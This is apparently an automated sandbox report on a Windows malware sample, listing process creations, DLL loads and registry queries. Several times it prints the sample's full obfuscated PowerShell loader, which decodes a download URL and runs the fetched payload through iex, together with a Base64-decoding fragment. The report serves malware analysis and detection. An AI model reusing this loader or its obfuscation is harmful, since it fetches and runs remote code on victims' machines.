.robnMejetdSjagguIncorcEndowtCideriSolcrv Oak.e,oarrlHu.boy Tax,)De,in ');$Programbibliotekerne=$Avenin[0];parasols (Baroclinicity ' F,rh$Ergong u.tyl Eth oBlomkbSubdaaOparbl,lind:str kpSt,ndh PimpyCivillmun rlForgioSociam itniaCrocknAudi,cUne.cySquam=Pig oN koreeDra bwNarci- StowO UnspbBonitjYderpeSporec murktSwopc SignaSCed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Colouration.Afh && echo $"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Skraaningsvinklen = 1;$Fotografiapparaternes202='Substrin';$Fotografiapparaternes202+='g';Function Baroclinicity($Genforenende){$Piccoloerne=$Genforenende.Length-$Skraaningsvinklen;For($Vainness=5; $Vainness -lt $Piccoloerne; $Vainness+=(6)){$Flyttende+=$Genforenende.$Fotografiapparaternes202.Invoke($Vainness, $Skraaningsvinklen);}$Flyttende;}function parasols($Dugpunkts){. ($isskabes) ($Dugpunkts);}$Strandedness=Baroclinicity 'Age eMMicrooSyd,rzThermiToftmlS lenlMarp,a Mak /Relev5Samov.Blood0 fte Thol( efolW TeltiD arfnAnk.nd BagsoCampiwG,debsOmnip Fo laNBrndsTGgele Stikh1 S,ud0frang. Kond0Thoke;,aptu RumguWKoalii,arpenMongr6 Lu,s4 .nde;Sexua UnderxGejrp6Tou,n4 Midw;Dista MalmrVisitv,teto:Hykle1Dryad2 Hard1Cysto.Clupe0Prcis) boga LaborGEneboeChenicBureak Clemo Gang/Flgev2Sm.at0Dsles1 nnih0 Ribn0oxli,1 T.ag0Etape1 Otm emulFDataliHastur BliteMiscofOverboSalgsx ulph/ ,her1Decim2 Bero1A,ieh.Thras0Opstt ';$Budgetforslags=Baroclinicity 'VelseUBlurssBrnepeForlgrharmo-SaddeABefrugDeso,eSneglnQuatrtDilog ';$Programbibliotekerne=Baroclinicity 'InfamhBrygmt DisptFluespUlovmsTypeh: ,thi/Narco/Und rdRenour Hel,i skftv DetieFring.MaanegRverko orkaoPrincg femvlBrazie ,rof. Pro,cFlertoC,burm K ge/SekunuTska.cSekre? kriteUnstaxForedp Vando SealrInd.at dspa= Ranud TykmoStru w.lasknNa lsl HattoSu,ceaLibiddSmitt&HippoiVan hdAbsin=Infor1Ra koSH.ktiEb.lavG PruncDis iwK,lleB HanlcDeterOSpaliPTodiduIntr.C Bldg6BefliM,tipu5Subscv aturD AlimjPrimukAnnekN HandXRagiuiHovedP DraczSvingaRetrtZPa,ktoConcezmega.dConsiUStowbePrsen2 NdriwRaen. ';$Noninductively=Baroclinicity 'Ubeh.>C.rap ';$isskabes=Baroclinicity ' osoniTagryeB lstxCha,l ';$Leisjes = Baroclinicity 'sejtreFristc ,olihEndo,oYemel Steff%Anti.aMinicpSpindpSluggdResida SuivtSoundaDagce%Burkg\HemagCTalrkoW mbwl.otheoOvergusmrgarbaadfa Yamst nderiFoolsoAleu,n Call.Zool.AMerogfMapuchDonk, Belor&Welte&Uhlan EndeveTil.ucRustlhWebe.o Pred Post$Sagge ';parasols (Baroclinicity 'Victu$Skrpeg FrivlInduso Omstbeks.ma NeollBe.kn:LevelP,evier,llano,ivisgUnregrThundaAlumim,agfjmCytoseSkinnrRetu.iChiconWe,trgLo dosPreovm,sbryaH,ilkeEj rssEskilsColliiUnactgNedlu=Borto(Ud,mecRentemr,ckid Styr S,ati/georgc E.gy Overt$DispeLSweeteGesanihoneysAesirjFr,eseEqua,sSerr,)saliv ');parasols (Baroclinicity 'Engan$SpilugSordal .mmeoErhvebT appaDamp,l Part: ackhAD spivColumeF nden rettiTungnn B lr=Hachi$ Se uPErlggrLivero mpongRegiorTzotzaColismBenefbDvehjiOtolob BelclAlmeiiEk,troHylomt aadreFormokcentueInterr paanEulogeFavis.Rensks HullpIdeallUreteipraestAssor(Sol r$MalefNOmregoThomanViftei .robnMejetdSjagguIncorcEndowtCideriSolcrv Oak.e,oarrlHu.boy Tax,)De,in ');$Programbibliotekerne=$Avenin[0];parasols (Baroclinicity ' F,rh$Ergong u.tyl Eth oBlomkbSubdaaOparbl,lind:str kpSt,ndh PimpyCivillmun rlForgioSociam itniaCrocknAudi,cUne.cySquam=Pig oN koreeDra bwNarci- StowO UnspbBonitjYderpeSporec murktSwopc SignaSCed Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Colouration.Afh && echo $" Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: vbscript.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptnet.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: webio.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cabinet.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.1478677403.0000024518932000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000003.00000002.1478677403.0000024518932000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb1 source: powershell.exe, 00000003.00000002.1477405694.00000245188C0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: lib.pdb source: powershell.exe, 00000003.00000002.1475618652.00000245186D5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdbID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000003.00000002.1478677403.0000024518932000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdb source: powershell.exe, 00000003.00000002.1475618652.00000245186D5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.1476770908.0000024518751000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdbCLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32N source: powershell.exe, 00000003.00000002.1478677403.0000024518932000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdbk source: powershell.exe, 00000003.00000002.1475618652.00000245186D5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: rlib.pdb source: powershell.exe, 00000003.00000002.1475618652.00000245186D5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: CallSite.Target.pdb source: powershell.exe, 00000003.00000002.1475618652.0000024518688000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

barindex
Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: .Run("POWERSHELL "$Skraaningsvinklen = 1;$Fotografiapparaternes202='Substrin';$Fotografiapparaternes202+='g';Function B", "0")
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($Landsbyprsten) if ($_.FullyQualifiedErrorId -ne "NativeCommandErrorMessage" -and $ErrorView -ne "CategoryView")
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Skraaningsvinklen = 1;$Fotografiapparaternes202='Substrin';$Fotografiapparaternes202+='g';Function Baroclinicity($Genforenende){$Piccoloerne=$Genforenende.Length-$Skraaningsvinklen;For($Vainness=5; $Vainness -lt $Piccoloerne; $Vainness+=(6)){$Flyttende+=$Genforenende.$Fotografiapparaternes202.Invoke($Vainness, $Skraaningsvinklen);}$Flyttende;}function parasols($Dugpunkts){. ($isskabes) ($Dugpunkts);}$Strandedness=Baroclinicity 'Age eMMicrooSyd,rzThermiToftmlS lenlMarp,a Mak /Relev5Samov.Blood0 fte Thol( efolW TeltiD arfnAnk.nd BagsoCampiwG,debsOmnip Fo laNBrndsTGgele Stikh1 S,ud0frang. Kond0Thoke;,aptu RumguWKoalii,arpenMongr6 Lu,s4 .nde;Sexua UnderxGejrp6Tou,n4 Midw;Dista MalmrVisitv,teto:Hykle1Dryad2 Hard1Cysto.Clupe0Prcis) boga LaborGEneboeChenicBureak Clemo Gang/Flgev2Sm.at0Dsles1 nnih0 Ribn0oxli,1 T.ag0Etape1 Otm emulFDataliHastur BliteMiscofOverboSalgsx ulph/ ,her1Decim2 Bero1A,ieh.Thras0Opstt ';$Budgetforslags=Baroclinicity 'VelseUBlurssBrnepeForlgrharmo-SaddeABefrugDeso,eSneglnQuatrtDilog ';$Programbibliotekerne=Baroclinicity 'InfamhBrygmt DisptFluespUlovmsTypeh: ,thi/Narco/Und rdRenour Hel,i skftv DetieFring.MaanegRverko orkaoPrincg femvlBrazie ,rof. Pro,cFlertoC,burm K ge/SekunuTska.cSekre? kriteUnstaxForedp Vando SealrInd.at dspa= Ranud TykmoStru w.lasknNa lsl HattoSu,ceaLibiddSmitt&HippoiVan hdAbsin=Infor1Ra koSH.ktiEb.lavG PruncDis iwK,lleB HanlcDeterOSpaliPTodiduIntr.C Bldg6BefliM,tipu5Subscv aturD AlimjPrimukAnnekN HandXRagiuiHovedP DraczSvingaRetrtZPa,ktoConcezmega.dConsiUStowbePrsen2 NdriwRaen. ';$Noninductively=Baroclinicity 'Ubeh.>C.rap ';$isskabes=Baroclinicity ' osoniTagryeB lstxCha,l ';$Leisjes = Baroclinicity 'sejtreFristc ,olihEndo,oYemel Steff%Anti.aMinicpSpindpSluggdResida SuivtSoundaDagce%Burkg\HemagCTalrkoW mbwl.otheoOvergusmrgarbaadfa Yamst nderiFoolsoAleu,n Call.Zool.AMerogfMapuchDonk, Belor&Welte&Uhlan EndeveTil.ucRustlhWebe.o Pred Post$Sagge ';parasols (Baroclinicity 'Victu$Skrpeg FrivlInduso Omstbeks.ma NeollBe.kn:LevelP,evier,llano,ivisgUnregrThundaAlumim,agfjmCytoseSkinnrRetu.iChiconWe,trgLo dosPreovm,sbryaH,ilkeEj rssEskilsColliiUnactgNedlu=Borto(Ud,mecRentemr,ckid Styr S,ati/georgc E.gy Overt$DispeLSweeteGesanihoneysAesirjFr,eseEqua,sSerr,)saliv ');parasols (Baroclinicity 'Engan$SpilugSordal .mmeoErhvebT appaDamp,l Part: ackhAD spivColumeF nden rettiTungnn B lr=Hachi$ Se uPErlggrLivero mpongRegiorTzotzaColismBenefbDvehjiOtolob BelclAlmeiiEk,troHylomt aadreFormokcentueInterr paanEulogeFavis.Rensks HullpIdeallUreteipraestAssor(Sol r$MalefNOmregoThomanViftei .robnMejetdSjagguIncorcEndowtCideriSolcrv Oak.e,oarrlHu.boy Tax,)De,in ');$Programbibliotekerne=$Avenin[0];parasols (Baroclinicity ' F,rh$Ergong u.tyl Eth oBlomkbSubdaaOparbl,lind:str kpSt,ndh PimpyCivillmun rlForgioSociam itniaCrocknAudi,cUne.cySquam=Pig oN koreeDra bwNarci- StowO UnspbBonitjYderpeSporec murktSwopc SignaSCed
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Skraaningsvinklen = 1;$Fotografiapparaternes202='Substrin';$Fotografiapparaternes202+='g';Function Baroclinicity($Genforenende){$Piccoloerne=$Genforenende.Length-$Skraaningsvinklen;For($Vainness=5; $Vainness -lt $Piccoloerne; $Vainness+=(6)){$Flyttende+=$Genforenende.$Fotografiapparaternes202.Invoke($Vainness, $Skraaningsvinklen);}$Flyttende;}function parasols($Dugpunkts){. ($isskabes) ($Dugpunkts);}$Strandedness=Baroclinicity 'Age eMMicrooSyd,rzThermiToftmlS lenlMarp,a Mak /Relev5Samov.Blood0 fte Thol( efolW TeltiD arfnAnk.nd BagsoCampiwG,debsOmnip Fo laNBrndsTGgele Stikh1 S,ud0frang. Kond0Thoke;,aptu RumguWKoalii,arpenMongr6 Lu,s4 .nde;Sexua UnderxGejrp6Tou,n4 Midw;Dista MalmrVisitv,teto:Hykle1Dryad2 Hard1Cysto.Clupe0Prcis) boga LaborGEneboeChenicBureak Clemo Gang/Flgev2Sm.at0Dsles1 nnih0 Ribn0oxli,1 T.ag0Etape1 Otm emulFDataliHastur BliteMiscofOverboSalgsx ulph/ ,her1Decim2 Bero1A,ieh.Thras0Opstt ';$Budgetforslags=Baroclinicity 'VelseUBlurssBrnepeForlgrharmo-SaddeABefrugDeso,eSneglnQuatrtDilog ';$Programbibliotekerne=Baroclinicity 'InfamhBrygmt DisptFluespUlovmsTypeh: ,thi/Narco/Und rdRenour Hel,i skftv DetieFring.MaanegRverko orkaoPrincg femvlBrazie ,rof. Pro,cFlertoC,burm K ge/SekunuTska.cSekre? kriteUnstaxForedp Vando SealrInd.at dspa= Ranud TykmoStru w.lasknNa lsl HattoSu,ceaLibiddSmitt&HippoiVan hdAbsin=Infor1Ra koSH.ktiEb.lavG PruncDis iwK,lleB HanlcDeterOSpaliPTodiduIntr.C Bldg6BefliM,tipu5Subscv aturD AlimjPrimukAnnekN HandXRagiuiHovedP DraczSvingaRetrtZPa,ktoConcezmega.dConsiUStowbePrsen2 NdriwRaen. ';$Noninductively=Baroclinicity 'Ubeh.>C.rap ';$isskabes=Baroclinicity ' osoniTagryeB lstxCha,l ';$Leisjes = Baroclinicity 'sejtreFristc ,olihEndo,oYemel Steff%Anti.aMinicpSpindpSluggdResida SuivtSoundaDagce%Burkg\HemagCTalrkoW mbwl.otheoOvergusmrgarbaadfa Yamst nderiFoolsoAleu,n Call.Zool.AMerogfMapuchDonk, Belor&Welte&Uhlan EndeveTil.ucRustlhWebe.o Pred Post$Sagge ';parasols (Baroclinicity 'Victu$Skrpeg FrivlInduso Omstbeks.ma NeollBe.kn:LevelP,evier,llano,ivisgUnregrThundaAlumim,agfjmCytoseSkinnrRetu.iChiconWe,trgLo dosPreovm,sbryaH,ilkeEj rssEskilsColliiUnactgNedlu=Borto(Ud,mecRentemr,ckid Styr S,ati/georgc E.gy Overt$DispeLSweeteGesanihoneysAesirjFr,eseEqua,sSerr,)saliv ');parasols (Baroclinicity 'Engan$SpilugSordal .mmeoErhvebT appaDamp,l Part: ackhAD spivColumeF nden rettiTungnn B lr=Hachi$ Se uPErlggrLivero mpongRegiorTzotzaColismBenefbDvehjiOtolob BelclAlmeiiEk,troHylomt aadreFormokcentueInterr paanEulogeFavis.Rensks HullpIdeallUreteipraestAssor(Sol r$MalefNOmregoThomanViftei .robnMejetdSjagguIncorcEndowtCideriSolcrv Oak.e,oarrlHu.boy Tax,)De,in ');$Programbibliotekerne=$Avenin[0];parasols (Baroclinicity ' F,rh$Ergong u.tyl Eth oBlomkbSubdaaOparbl,lind:str kpSt,ndh PimpyCivillmun rlForgioSociam itniaCrocknAudi,cUne.cySquam=Pig oN koreeDra bwNarci- StowO UnspbBonitjYderpeSporec murktSwopc SignaSCed Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_00007FFAAC3409CA push E85E445Dh; ret 3_2_00007FFAAC3409F9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_00007FFAAC347287 push esp; retf 3_2_00007FFAAC347288
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
